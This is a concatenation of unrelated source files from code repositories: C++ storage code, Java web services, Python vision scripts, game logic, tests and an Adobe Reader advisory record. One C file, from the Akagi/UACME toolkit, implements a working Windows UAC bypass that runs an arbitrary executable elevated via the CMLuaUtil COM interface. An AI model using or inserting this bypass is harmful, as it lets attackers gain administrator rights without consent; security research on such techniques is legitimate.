return JoinPathSegments(GetServerTypeDataPath(root, server_type_), kInstanceMetadataFileName);
}
std::string FsManager::GetFsLockFilePath(const string& root) const {
return JoinPathSegments(GetServerTypeDataPath(root, server_type_), kFsLockFileName);
}
std::string FsManager::GetDefaultRootDir() const {
DCHECK(initted_);
return GetServerTypeDataPath(canonicalized_default_fs_root_, server_type_);
}
std::string FsManager::GetCertsDir(const std::string& root_dir) {
return JoinPathSegments(root_dir, kSecureCertsDirName);
}
std::vector<std::string> FsManager::GetConsensusMetadataDirs() const {
DCHECK(initted_);
vector<string> data_paths;
data_paths.reserve(canonicalized_data_fs_roots_.size());
for (const string& data_fs_root : canonicalized_data_fs_roots_) {
data_paths.push_back(GetConsensusMetadataDir(
GetServerTypeDataPath(data_fs_root, server_type_)));
}
return data_paths;
}
std::string FsManager::GetConsensusMetadataDir(const std::string& data_dir) {
return JoinPathSegments(data_dir, kConsensusMetadataDirName);
}
Result<std::string> FsManager::GetConsensusMetadataPath(const std::string &tablet_id) const {
return JoinPathSegments(GetConsensusMetadataDir(VERIFY_RESULT(GetTabletPath(tablet_id))),
tablet_id);
}
std::string FsManager::GetFirstTabletWalDirOrDie(const std::string& table_id,
const std::string& tablet_id) const {
auto wal_root_dirs = GetWalRootDirs();
CHECK(!wal_root_dirs.empty()) << "No WAL directories specified";
auto table_wal_dir = JoinPathSegments(wal_root_dirs[0], Substitute("table-$0", table_id));
return JoinPathSegments(table_wal_dir, Substitute("tablet-$0", tablet_id));
}
std::string FsManager::GetTabletWalRecoveryDir(const string& tablet_wal_path) {
return tablet_wal_path + kWalsRecoveryDirSuffix;
}
namespace {
const auto kWalFileNameFullPrefix = std::string(FsManager::kWalFileNamePrefix) + "-";
} // namespace
std::string FsManager::GetWalSegmentFileName(uint64_t sequence_number) {
return Format("$0$1", kWalFileNameFullPrefix, StringPrintf("%09" PRIu64, sequence_number));
}
bool FsManager::IsWalSegmentFileName(const std::string& file_name) {
return boost::starts_with(file_name, kWalFileNameFullPrefix);
}
// ==========================================================================
// Dump/Debug utils
// ==========================================================================
void FsManager::DumpFileSystemTree(ostream& out) {
DCHECK(initted_);
for (const string& root : canonicalized_all_fs_roots_) {
out << "File-System Root: " << root << std::endl;
std::vector<string> objects;
Status s = env_->GetChildren(root, &objects);
if (!s.ok()) {
LOG(ERROR) << "Unable to list the fs-tree: " << s.ToString();
return;
}
DumpFileSystemTree(out, "|-", root, objects);
}
}
void FsManager::DumpFileSystemTree(ostream& out, const string& prefix,
const string& path, const vector<string>& objects) {
for (const string& name : objects) {
if (name == "." || name == "..") continue;
std::vector<string> sub_objects;
string sub_path = JoinPathSegments(path, name);
Status s = env_->GetChildren(sub_path, &sub_objects);
if (s.ok()) {
out << prefix << name << "/" << std::endl;
DumpFileSystemTree(out, prefix + "---", sub_path, sub_objects);
} else {
out << prefix << name << std::endl;
}
}
}
Result<std::vector<std::string>> FsManager::ListDir(const std::string& path) const {
std::vector<std::string> result;
RETURN_NOT_OK(env_->GetChildren(path, ExcludeDots::kTrue, &result));
return result;
}
Status FsManager::ListDir(const std::string& path, std::vector<std::string> *objects) const {
return env_->GetChildren(path, objects);
}
} // namespace yb
| 11,039 |
4,487 | <filename>Source/Akagi/methods/api0cradle.c
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2017 - 2020
*
* TITLE: API0CRADLE.C
*
* VERSION: 3.50
*
* DATE: 11 Oct 2020
*
* UAC bypass method from Oddvar Moe aka api0cradle.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
/*
* ucmCMLuaUtilShellExecMethod
*
* Purpose:
*
* Bypass UAC using AutoElevated undocumented CMLuaUtil interface.
* This function expects that supMasqueradeProcess was called on process initialization.
*
*/
NTSTATUS ucmCMLuaUtilShellExecMethod(
_In_ LPWSTR lpszExecutable
)
{
NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
HRESULT r = E_FAIL, hr_init;
BOOL bApprove = FALSE;
ICMLuaUtil* CMLuaUtil = NULL;
hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
do {
//
// Potential fix check.
//
if (supIsConsentApprovedInterface(T_CLSID_CMSTPLUA, &bApprove)) {
if (bApprove == FALSE) {
MethodResult = STATUS_NOINTERFACE;
break;
}
}
r = ucmAllocateElevatedObject(
T_CLSID_CMSTPLUA,
&IID_ICMLuaUtil,
CLSCTX_LOCAL_SERVER,
(void**)&CMLuaUtil);
if (r != S_OK)
break;
if (CMLuaUtil == NULL) {
r = E_OUTOFMEMORY;
break;
}
r = CMLuaUtil->lpVtbl->ShellExec(CMLuaUtil,
lpszExecutable,
NULL,
NULL,
SEE_MASK_DEFAULT,
SW_SHOW);
if (SUCCEEDED(r))
MethodResult = STATUS_SUCCESS;
} while (FALSE);
if (CMLuaUtil != NULL) {
CMLuaUtil->lpVtbl->Release(CMLuaUtil);
}
if (hr_init == S_OK)
CoUninitialize();
return MethodResult;
}
| 1,015 |
697 | <filename>leyou-api-gateway/src/main/java/com/leyou/filter/LoginFilter.java
package com.leyou.filter;
import com.leyou.auth.utils.JwtUtils;
import com.leyou.config.FilterProperties;
import com.leyou.config.JwtProperties;
import com.leyou.utils.CookieUtils;
import com.netflix.zuul.ZuulFilter;
import com.netflix.zuul.context.RequestContext;
import com.netflix.zuul.exception.ZuulException;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.boot.context.properties.EnableConfigurationProperties;
import org.springframework.http.HttpStatus;
import org.springframework.stereotype.Component;
import javax.servlet.http.HttpServletRequest;
import java.util.Arrays;
import java.util.List;
/**
* @Author: 98050
* @Time: 2018-10-24 16:21
* @Feature: 登录拦截器
*/
@Component
//@EnableConfigurationProperties({JwtProperties.class,FilterProperties.class})
public class LoginFilter extends ZuulFilter {
@Autowired
private JwtProperties properties;
@Autowired
private FilterProperties filterProperties;
private static final Logger logger = LoggerFactory.getLogger(LoginFilter.class);
@Override
public String filterType() {
return "pre";
}
@Override
public int filterOrder() {
return 5;
}
@Override
public boolean shouldFilter() {
//1.获取上下文
RequestContext context = RequestContext.getCurrentContext();
//2.获取request
HttpServletRequest request = context.getRequest();
//3.获取路径
String requestUri = request.getRequestURI();
logger.info(requestUri);
//4.判断白名单
return !isAllowPath(requestUri);
}
private boolean isAllowPath(String requestUri) {
//1.定义一个标记
boolean flag = false;
//2.遍历允许访问的路径
List<String> paths = Arrays.asList(this.filterProperties.getAllowPaths().split(" "));
for (String path : paths){
if (requestUri.startsWith(path)){
flag = true;
break;
}
}
return flag;
}
@Override
public Object run() throws ZuulException {
//1.获取上下文
RequestContext context = RequestContext.getCurrentContext();
//2.获取request
HttpServletRequest request = context.getRequest();
//3.获取token
String token = CookieUtils.getCookieValue(request,this.properties.getCookieName());
//4.校验
try{
//4.1 校验通过,放行
JwtUtils.getInfoFromToken(token,this.properties.getPublicKey());
}catch (Exception e){
//4.2 校验不通过,返回403
context.setSendZuulResponse(false);
context.setResponseStatusCode(HttpStatus.FORBIDDEN.value());
}
return null;
}
}
| 1,260 |
892 | {
"schema_version": "1.2.0",
"id": "GHSA-gxgp-2885-hjmh",
"modified": "2022-05-13T01:06:43Z",
"published": "2022-05-13T01:06:43Z",
"aliases": [
"CVE-2015-5583"
],
"details": "Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allow attackers to bypass intended sandbox restrictions and obtain sensitive PDF information by launching a print job on a remote printer, a different vulnerability than CVE-2015-6705, CVE-2015-6706, and CVE-2015-7624.",
"severity": [
],
"affected": [
],
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2015-5583"
},
{
"type": "WEB",
"url": "https://helpx.adobe.com/security/products/acrobat/apsb15-24.html"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id/1033796"
},
{
"type": "WEB",
"url": "http://www.zerodayinitiative.com/advisories/ZDI-15-468"
}
],
"database_specific": {
"cwe_ids": [
"CWE-200"
],
"severity": "MODERATE",
"github_reviewed": false
}
} | 528 |
676 | <filename>app/src/main/java/core/issue/IssuesService.java<gh_stars>100-1000
package core.issue;
import core.issues.Issue;
import java.util.List;
import java.util.Map;
import retrofit2.Call;
import retrofit2.http.GET;
import retrofit2.http.Path;
import retrofit2.http.QueryMap;
public interface IssuesService {
@GET("/repos/{owner}/{name}/issues?sort=updated")
Call<List<Issue>> issues(@Path("owner") String owner, @Path("name") String repo, @QueryMap Map<String, String> filter);
@GET("/repos/{owner}/{name}/issues?sort=updated")
Call<List<Issue>> issues(@Path("owner") String owner, @Path("name") String repo, @QueryMap Map<String, String> filter,
@retrofit.http.Query("page") int page);
}
| 248 |
476 | <filename>resources/nn/custom_model/handler.py
import cv2
import numpy as np
from depthai_sdk import frameNorm
def decode(nnManager, packet):
bboxes = np.array(packet.getFirstLayerFp16())
bboxes = bboxes.reshape((bboxes.size // 7, 7))
bboxes = bboxes[bboxes[:, 2] > 0.5]
labels = bboxes[:, 1].astype(int)
confidences = bboxes[:, 2]
bboxes = bboxes[:, 3:7]
return {
"labels": labels,
"confidences": confidences,
"bboxes": bboxes
}
decoded = ["unknown", "face"]
def draw(nnManager, data, frames):
for name, frame in frames:
if name == nnManager.source:
for label, conf, raw_bbox in zip(*data.values()):
bbox = frameNorm(frame, raw_bbox)
cv2.rectangle(frame, (bbox[0], bbox[1]), (bbox[2], bbox[3]), (255, 0, 0), 2)
cv2.putText(frame, decoded[label], (bbox[0] + 10, bbox[1] + 20), cv2.FONT_HERSHEY_TRIPLEX, 0.5, 255)
cv2.putText(frame, f"{int(conf * 100)}%", (bbox[0] + 10, bbox[1] + 40), cv2.FONT_HERSHEY_TRIPLEX, 0.5, 255)
| 521 |
2,231 | <gh_stars>1000+
// Copyright 2020 The Defold Foundation
// Licensed under the Defold License version 1.0 (the "License"); you may not use
// this file except in compliance with the License.
//
// You may obtain a copy of the License, together with FAQs at
// https://www.defold.com/license
//
// Unless required by applicable law or agreed to in writing, software distributed
// under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
// CONDITIONS OF ANY KIND, either express or implied. See the License for the
// specific language governing permissions and limitations under the License.
#include <string.h>
#define JC_TEST_IMPLEMENTATION
#include <jc_test/jc_test.h>
#include "graphics.h"
#include "null/glsl_uniform_parser.h"
class dmGLSLUniformTest : public jc_test_base_class
{
protected:
virtual void SetUp()
{
}
virtual void TearDown()
{
}
};
struct Uniform
{
const char* m_Name;
uint32_t m_Length;
dmGraphics::Type m_Type;
};
static void UniformCallback(const char* name, uint32_t name_length, dmGraphics::Type type, uintptr_t userdata)
{
Uniform* uniform = (Uniform*)userdata;
uniform->m_Name = name;
uniform->m_Length = name_length;
uniform->m_Type = type;
}
#define ASSERT_TYPE(type_name, type)\
{\
Uniform uniform;\
const char* program = "uniform mediump " type_name " " type_name ";\n";\
bool result = dmGraphics::GLSLUniformParse(program, UniformCallback, (uintptr_t)&uniform);\
ASSERT_TRUE(result);\
ASSERT_EQ(0, strncmp(type_name, uniform.m_Name, strnlen(type_name, uniform.m_Length)));\
ASSERT_EQ(dmGraphics::TYPE_##type, uniform.m_Type);\
}
TEST_F(dmGLSLUniformTest, Types)
{
ASSERT_TYPE("int", INT);
ASSERT_TYPE("uint", UNSIGNED_INT);
ASSERT_TYPE("float", FLOAT);
ASSERT_TYPE("vec4", FLOAT_VEC4);
ASSERT_TYPE("mat4", FLOAT_MAT4);
ASSERT_TYPE("sampler2D", SAMPLER_2D);
}
TEST_F(dmGLSLUniformTest, IntroductionJunk)
{
Uniform uniform;
const char* program = ""
"varying mediump vec4 position;\n"
"varying mediump vec2 var_texcoord0;\n"
"uniform lowp sampler2D texture_sampler;\n";
bool result = dmGraphics::GLSLUniformParse(program, UniformCallback, (uintptr_t)&uniform);
ASSERT_TRUE(result);
ASSERT_EQ(0, strncmp("texture_sampler", uniform.m_Name, strnlen("texture_sampler", uniform.m_Length)));
ASSERT_EQ(dmGraphics::TYPE_SAMPLER_2D, uniform.m_Type);
}
int main(int argc, char **argv)
{
jc_test_init(&argc, argv);
return jc_test_run_all();
}
| 1,082 |
4,054 | // Copyright Yahoo. Licensed under the terms of the Apache 2.0 license. See LICENSE in the project root.
package com.yahoo.searchlib.aggregation;
import com.yahoo.text.Utf8;
import com.yahoo.vespa.objects.Deserializer;
import com.yahoo.vespa.objects.ObjectVisitor;
import com.yahoo.vespa.objects.Serializer;
public class VdsHit extends Hit {
public static final int classId = registerClass(0x4000 + 96, VdsHit.class);
private String docId = "";
private RawData summary = new RawData();
@SuppressWarnings("UnusedDeclaration")
public VdsHit() {
// user by deserializer
}
/**
* Create a hit with the given path and document id.
*
* @param summary The summary blob standard fs4 coding.
* @param docId The local document id.
* @param rank The rank of this hit.
*/
public VdsHit(String docId, byte[] summary, double rank) {
super(rank);
this.docId = docId;
this.summary = new RawData(summary);
}
/**
* Obtain the summary blob for this hit.
*
* @return The summary blob.
*/
public RawData getSummary() {
return summary;
}
/**
* Obtain the local document id of this hit.
*
* @return The local document id.
*/
public String getDocId() {
return docId;
}
@Override
protected int onGetClassId() {
return classId;
}
@Override
protected void onSerialize(Serializer buf) {
super.onSerialize(buf);
byte[] utf8 = Utf8.toBytes(docId);
buf.putInt(null, utf8.length);
buf.put(null, utf8);
summary.serialize(buf);
}
@Override
protected void onDeserialize(Deserializer buf) {
super.onDeserialize(buf);
docId = getUtf8(buf);
summary.deserialize(buf);
}
@Override
public int hashCode() {
return super.hashCode() + docId.hashCode() + summary.hashCode();
}
@Override
public boolean equals(Object obj) {
VdsHit rhs = (VdsHit)obj;
return super.equals(obj) &&
docId.equals(rhs.docId) &&
summary.equals(rhs.summary);
}
@Override
public void visitMembers(ObjectVisitor visitor) {
super.visitMembers(visitor);
visitor.visit("docId", docId);
visitor.visit("summary", summary);
}
}
| 979 |
533 | from insomniac import activation_controller
exec(activation_controller.get_extra_feature('filters'))
| 28 |
7,899 | <reponame>muminkoykiran/computervision-recipes
import os
import time
import base64
import urllib
from io import BytesIO
import cv2
import numpy as np
from tf_pose.estimator import TfPoseEstimator
from tf_pose.networks import get_graph_path, model_wh
from PIL import Image
import tensorflow as tf
import logging
import sys
# dir_path = os.path.dirname(os.path.realpath(__file__))
# sys.path.append(dir_path + "/../third_party/mcnn/src")
# import network
# from crowd_count import CrowdCounter
from crowdcountmcnn.src import network
from crowdcountmcnn.src.crowd_count import CrowdCounter
from abc import ABC, abstractmethod
class CrowdCounting(ABC):
@abstractmethod
def score(self): # pragma: no cover
raise NotImplementedError
class Router(CrowdCounting):
"""Router model definition.
Args:
gpu_id: GPU ID, integer starting from 0.
"""
def __init__(
self,
gpu_id=0,
mcnn_model_path="mcnn_shtechA_660.h5",
cutoff_pose=20,
cutoff_mcnn=50,
):
self._model_openpose = CrowdCountModelPose(gpu_id)
self._model_mcnn = CrowdCountModelMCNN(gpu_id, model_path=mcnn_model_path)
self._cutoff_pose = cutoff_pose
self._cutoff_mcnn = cutoff_mcnn
self._logger = logging.getLogger(__name__)
def score(self, filebytes, return_image=False, img_dim=1750):
dict_openpose = self._model_openpose.score(
filebytes, return_image, img_dim=img_dim
)
result_openpose = dict_openpose["pred"]
dict_mcnn = self._model_mcnn.score(filebytes, return_image, img_dim=img_dim)
result_mcnn = dict_mcnn["pred"]
self._logger.info("OpenPose results: {}".format(result_openpose))
self._logger.info("MCNN results: {}".format(result_mcnn))
if result_openpose > self._cutoff_pose and result_mcnn > self._cutoff_mcnn:
return dict_mcnn
else:
return dict_openpose
class CrowdCountModelMCNN(CrowdCounting):
"""MCNN model definition.
Args:
gpu_id: GPU ID, integer starting from 0.
"""
def __init__(self, gpu_id=0, model_path="mcnn_shtechA_660.h5"):
# load MCNN
self._net = CrowdCounter()
network.load_net(model_path, self._net)
if gpu_id == -1:
self._net.cpu()
else:
self._net.cuda(gpu_id)
self._net.eval()
self._logger = logging.getLogger(__name__)
def score(self, filebytes, return_image=False, img_dim=1750):
"""Score an image.
Args:
filebytes: Image in stream.
return_image (optional): Whether a scored image needs to be returned, defaults to False.
img_dim (optional): Max dimension of image, defaults to 1750.
Returns:
A dictionary with number of people in image, timing for steps, and optionally, returned image.
"""
self._logger.info("---started scoring image using MCNN---")
t = time.time()
image = load_jpg(filebytes, img_dim)
t_image_prepare = round(time.time() - t, 3)
self._logger.info("time on preparing image: {} seconds".format(t_image_prepare))
t = time.time()
pred_mcnn, model_output = score_mcnn(self._net, image)
t_score = round(time.time() - t, 3)
self._logger.info("time on scoring image: {} seconds".format(t_score))
result = {}
result["pred"] = int(round(pred_mcnn, 0))
if not return_image:
dict_time = dict(
zip(["t_image_prepare", "t_score"], [t_image_prepare, t_score])
)
else:
t = time.time()
scored_image = draw_image_mcnn(model_output)
t_image_draw = round(time.time() - t, 3)
self._logger.info("time on drawing image: {}".format(t_image_draw))
t = time.time()
scored_image = web_encode_image(scored_image)
t_image_encode = round(time.time() - t, 3)
self._logger.info("time on encoding image: {}".format(t_image_encode))
dict_time = dict(
zip(
["t_image_prepare", "t_score", "t_image_draw", "t_image_encode"],
[t_image_prepare, t_score, t_image_draw, t_image_encode],
)
)
result["image"] = scored_image
# sum up total time
t_total = 0
for k in dict_time:
t_total += dict_time[k]
dict_time["t_total"] = round(t_total, 3)
self._logger.info("total time: {}".format(round(t_total, 3)))
result["time"] = dict_time
self._logger.info("---finished scoring image---")
return result
class CrowdCountModelPose(CrowdCounting):
"""OpenPose model definition.
Args:
gpu_id: GPU ID, integer starting from 0. Set it to -1 to use CPU.
"""
def __init__(self, gpu_id=0):
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
config.allow_soft_placement = True
config.log_device_placement = True
model = "cmu"
resize = "656x368"
self._w, self._h = model_wh(resize)
self._model = init_model(gpu_id, model, self._w, self._h, config)
self._logger = logging.getLogger(__name__)
def score(self, filebytes, return_image=False, img_dim=1750):
"""Score an image.
Args:
filebytes: Image in stream.
return_image (optional): Whether a scored image needs to be returned, defaults to False.
img_dim (optional): Max dimension of image, defaults to 1750.
Returns:
A dictionary with number of people in image, timing for steps, and optionally, returned image.
"""
self._logger.info("---started scoring image using OpenPose---")
t = time.time()
img = create_openpose_image(filebytes, img_dim)
t_image_prepare = round(time.time() - t, 3)
self._logger.info("time on preparing image: {} seconds".format(t_image_prepare))
t = time.time()
humans = score_openpose(self._model, img, self._w, self._h)
t_score = round(time.time() - t, 3)
self._logger.info("time on scoring image: {} seconds".format(t_score))
result = {}
result["pred"] = len(humans)
if not return_image:
dict_time = dict(
zip(["t_image_prepare", "t_score"], [t_image_prepare, t_score])
)
else:
t = time.time()
scored_image = draw_image(img, humans)
t_image_draw = round(time.time() - t, 3)
self._logger.info("time on drawing image: {}".format(t_image_draw))
t = time.time()
scored_image = web_encode_image(scored_image)
t_image_encode = round(time.time() - t, 3)
self._logger.info("time on encoding image: {}".format(t_image_encode))
dict_time = dict(
zip(
["t_image_prepare", "t_score", "t_image_draw", "t_image_encode"],
[t_image_prepare, t_score, t_image_draw, t_image_encode],
)
)
result["image"] = scored_image
# sum up total time
t_total = 0
for k in dict_time:
t_total += dict_time[k]
dict_time["t_total"] = round(t_total, 3)
self._logger.info("total time: {}".format(round(t_total, 3)))
result["time"] = dict_time
self._logger.info("---finished scoring image---")
return result
def init_model(gpu_id, model, w, h, config):
"""Initialize model.
Args:
gpu_id: GPU ID.
Returns:
A TensorFlow model object.
"""
# if w == 0 or h == 0:
# w, h = 432, 368
if gpu_id == -1: # pragma: no cover
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
e = TfPoseEstimator(get_graph_path(model), target_size=(w, h), tf_config=config)
else:
with tf.device("/device:GPU:{}".format(gpu_id)):
e = TfPoseEstimator(
get_graph_path(model), target_size=(w, h), tf_config=config
)
return e
def create_openpose_image(filebytes, img_dim):
"""Create image from file bytes.
Args:
filebytes: Image in stream.
img_dim: Max dimension of image.
Returns:
Image in CV2 format.
"""
# file_bytes = np.asarray(bytearray(BytesIO(filebytes).read()), dtype=np.uint8)
file_bytes = np.fromstring(filebytes, np.uint8)
img = cv2.imdecode(file_bytes, cv2.IMREAD_COLOR)
img, _ = imresizeMaxDim(img, img_dim)
return img
def load_jpg(file_bytes, img_dim):
image = np.fromstring(file_bytes, np.uint8)
image = cv2.imdecode(image, 0).astype(np.float32)
image, _ = imresizeMaxDim(image, img_dim)
ht = image.shape[0]
wd = image.shape[1]
ht_1 = int(ht / 4) * 4
wd_1 = int(wd / 4) * 4
image = cv2.resize(image, (wd_1, ht_1))
image = image.reshape((1, 1, image.shape[0], image.shape[1]))
return image
def score_openpose(e, image, w, h):
"""Score an image using OpenPose model.
Args:
e: OpenPose model.
image: Image in CV2 format.
Returns:
Nubmer of people in image.
"""
resize_out_ratio = 4.0
humans = e.inference(
image, resize_to_default=(w > 0 and h > 0), upsample_size=resize_out_ratio
)
return humans
def draw_image(image, humans):
image = TfPoseEstimator.draw_humans(image, humans, imgcopy=False)
img = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
imgDebug = Image.fromarray(img)
return imgDebug
def web_encode_image(scored_image):
ret_imgio = BytesIO()
scored_image.save(ret_imgio, "PNG")
processed_file = base64.b64encode(ret_imgio.getvalue())
scored_image = urllib.parse.quote(processed_file)
return scored_image
def imresizeMaxDim(img, maxDim, boUpscale=False, interpolation=cv2.INTER_CUBIC):
"""Resize image.
Args:
img: Image in CV2 format.
maxDim: Maximum dimension.
boUpscale (optional): Defaults to False.
interpolation (optional): Defaults to cv2.INTER_CUBIC.
Returns:
Resized image and scale.
"""
scale = 1.0 * maxDim / max(img.shape[:2])
if scale < 1 or boUpscale:
img = cv2.resize(img, (0, 0), fx=scale, fy=scale, interpolation=interpolation)
else:
scale = 1.0
return img, scale
def score_mcnn(net, image):
model_output = net(image)
model_output_np = model_output.data.cpu().numpy()
estimated_count = np.sum(model_output_np)
return estimated_count, model_output
def draw_image_mcnn(model_output):
estimated_density = model_output.data.cpu().numpy()[0, 0, :, :]
estimated_density = np.uint8(estimated_density * 255 / estimated_density.max())
im = Image.fromarray(estimated_density, "L")
return im
| 5,072 |
567 | <gh_stars>100-1000
package parser;
/**
* Helper class that maps a feature or datatype to its appropriate dialect keyword
*/
public class DialectMap {
/* Name of the dialect */
String dialect;
/* Mapping to a feature in the dialect */
String mapping;
public String getDialect() {
return dialect;
}
public void setDialect(String dialect) {
this.dialect = dialect;
}
public String getMapping() {
return mapping;
}
public void setMapping(String mapping) {
this.mapping = mapping;
}
}
| 165 |
2,189 | <reponame>mys/steem<filename>libraries/vendor/rocksdb/db/transaction_log_impl.h
// Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
// This source code is licensed under both the GPLv2 (found in the
// COPYING file in the root directory) and Apache 2.0 License
// (found in the LICENSE.Apache file in the root directory).
#pragma once
#ifndef ROCKSDB_LITE
#include <vector>
#include "db/log_reader.h"
#include "db/version_set.h"
#include "options/db_options.h"
#include "port/port.h"
#include "rocksdb/env.h"
#include "rocksdb/options.h"
#include "rocksdb/transaction_log.h"
#include "rocksdb/types.h"
#include "util/filename.h"
namespace rocksdb {
class LogFileImpl : public LogFile {
public:
LogFileImpl(uint64_t logNum, WalFileType logType, SequenceNumber startSeq,
uint64_t sizeBytes) :
logNumber_(logNum),
type_(logType),
startSequence_(startSeq),
sizeFileBytes_(sizeBytes) {
}
std::string PathName() const override {
if (type_ == kArchivedLogFile) {
return ArchivedLogFileName("", logNumber_);
}
return LogFileName("", logNumber_);
}
uint64_t LogNumber() const override { return logNumber_; }
WalFileType Type() const override { return type_; }
SequenceNumber StartSequence() const override { return startSequence_; }
uint64_t SizeFileBytes() const override { return sizeFileBytes_; }
bool operator < (const LogFile& that) const {
return LogNumber() < that.LogNumber();
}
private:
uint64_t logNumber_;
WalFileType type_;
SequenceNumber startSequence_;
uint64_t sizeFileBytes_;
};
class TransactionLogIteratorImpl : public TransactionLogIterator {
public:
TransactionLogIteratorImpl(
const std::string& dir, const ImmutableDBOptions* options,
const TransactionLogIterator::ReadOptions& read_options,
const EnvOptions& soptions, const SequenceNumber seqNum,
std::unique_ptr<VectorLogPtr> files, VersionSet const* const versions,
const bool seq_per_batch);
virtual bool Valid() override;
virtual void Next() override;
virtual Status status() override;
virtual BatchResult GetBatch() override;
private:
const std::string& dir_;
const ImmutableDBOptions* options_;
const TransactionLogIterator::ReadOptions read_options_;
const EnvOptions& soptions_;
SequenceNumber startingSequenceNumber_;
std::unique_ptr<VectorLogPtr> files_;
bool started_;
bool isValid_; // not valid when it starts of.
Status currentStatus_;
size_t currentFileIndex_;
std::unique_ptr<WriteBatch> currentBatch_;
std::unique_ptr<log::Reader> currentLogReader_;
Status OpenLogFile(const LogFile* logFile,
std::unique_ptr<SequentialFileReader>* file);
struct LogReporter : public log::Reader::Reporter {
Env* env;
Logger* info_log;
virtual void Corruption(size_t bytes, const Status& s) override {
ROCKS_LOG_ERROR(info_log, "dropping %" ROCKSDB_PRIszt " bytes; %s", bytes,
s.ToString().c_str());
}
virtual void Info(const char* s) { ROCKS_LOG_INFO(info_log, "%s", s); }
} reporter_;
SequenceNumber currentBatchSeq_; // sequence number at start of current batch
SequenceNumber currentLastSeq_; // last sequence in the current batch
// Used only to get latest seq. num
// TODO(icanadi) can this be just a callback?
VersionSet const* const versions_;
const bool seq_per_batch_;
// Reads from transaction log only if the writebatch record has been written
bool RestrictedRead(Slice* record, std::string* scratch);
// Seeks to startingSequenceNumber reading from startFileIndex in files_.
// If strict is set,then must get a batch starting with startingSequenceNumber
void SeekToStartSequence(uint64_t startFileIndex = 0, bool strict = false);
// Implementation of Next. SeekToStartSequence calls it internally with
// internal=true to let it find next entry even if it has to jump gaps because
// the iterator may start off from the first available entry but promises to
// be continuous after that
void NextImpl(bool internal = false);
// Check if batch is expected, else return false
bool IsBatchExpected(const WriteBatch* batch, SequenceNumber expectedSeq);
// Update current batch if a continuous batch is found, else return false
void UpdateCurrentWriteBatch(const Slice& record);
Status OpenLogReader(const LogFile* file);
};
} // namespace rocksdb
#endif // ROCKSDB_LITE
| 1,434 |
348 | {"nom":"Désertines","circ":"3ème circonscription","dpt":"Mayenne","inscrits":347,"abs":144,"votants":203,"blancs":4,"nuls":5,"exp":194,"res":[{"nuance":"UDI","nom":"M. <NAME>","voix":157},{"nuance":"REM","nom":"M. <NAME>","voix":37}]} | 94 |
5,964 | #ifndef CONTENT_RENDERER_DEVTOOLS_DEVTOOLS_MGR_H_
#define CONTENT_RENDERER_DEVTOOLS_DEVTOOLS_MGR_H_
#include "third_party/WebKit/Source/wtf/HashSet.h"
namespace content {
class DevToolsMgr {
public:
DevToolsMgr();
static DevToolsMgr* getInst();
void addLivedId(int id);
void removeLivedId(int id);
bool isLivedId(int id) const;
int getNewestId();
private:
static DevToolsMgr* m_inst;
WTF::HashSet<int> m_ids;
int m_idGen;
};
}
#endif // CONTENT_RENDERER_DEVTOOLS_DEVTOOLS_MGR_H_ | 242 |
640 | <gh_stars>100-1000
void UpdateStage5EndBoss0(enemy *en)
{
en->enemyposy--;
if(en->enemyposy<=128)
{
en->enemyparama=1;
en->enemyparamb=0;
en->enemyframe=0;
}
}
void UpdateStage5EndBoss1(enemy *en)
{
unsigned char a;
if(en->enemyframe==250)
{
en->enemyparama=2;
return;
}
// Skull movement!
DoSkullSinusMovement(en,2,0);
// Shooting
if(en->enemyframe%80==64)
{
for(a=0;a<5;a++)
{
InitEnemy(en->enemyposx+(a*8),en->enemyposy+48,STAGE5MISSILE);
enemies[numenemies-1].enemyparamb=a;
}
// Sound
PlaySound(enemybomb_psg,1);
}
}
void UpdateStage5EndBoss2(enemy *en)
{
en->enemyposy--;
if(en->enemyposy<=24)
{
en->enemyparama=3;
en->enemyparamb=0;
en->enemyframe=0;
}
}
void UpdateStage5EndBoss3(enemy *en)
{
if(en->enemyframe==250)
{
en->enemyparama=4;
return;
}
// Skull movement!
DoSkullSinusMovement(en,2,0);
// Shooting
if(en->enemyframe%16==4)
{
InitEnemyshoot(en->enemyposx,en->enemyposy+20,1);
InitEnemyshoot(en->enemyposx+32,en->enemyposy+20,1);
}
// Laser
if(en->enemyframe%32==0)
InitEnemyshootLaser(en->enemyposx+16,en->enemyposy+56);
}
void UpdateStage5EndBoss4(enemy *en)
{
en->enemyposy++;
if(en->enemyposy>=128)
{
en->enemyparama=1;
en->enemyparamb=0;
en->enemyframe=0;
}
}
unsigned char UpdateStage5EndBoss(enemy *en)
{
// Draw
DrawSpriteArray(STAGE5ENDBOSSBASE,en->enemyposx,en->enemyposy,40,56);
// Call custom function
//changeBank(FIXEDBANKSLOT);
(*(updatestage5endbossfunctions[en->enemyparama]))(en);
// Exit
return 1;
}
| 743 |
1,630 | <filename>tests/test_data/test_data_parallel_sampler.py
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
import os
from functools import partial
from pathlib import Path
import pytest
import torch
import torch.distributed as dist
import torch.multiprocessing as mp
import colossalai
from torchvision import transforms, datasets
from colossalai.context import ParallelMode, Config
from colossalai.core import global_context as gpc
from colossalai.utils import get_dataloader, free_port
from colossalai.testing import rerun_if_address_is_in_use
CONFIG = Config(dict(
parallel=dict(
pipeline=dict(size=1),
tensor=dict(size=1, mode=None),
),
seed=1024,
))
def run_data_sampler(rank, world_size, port):
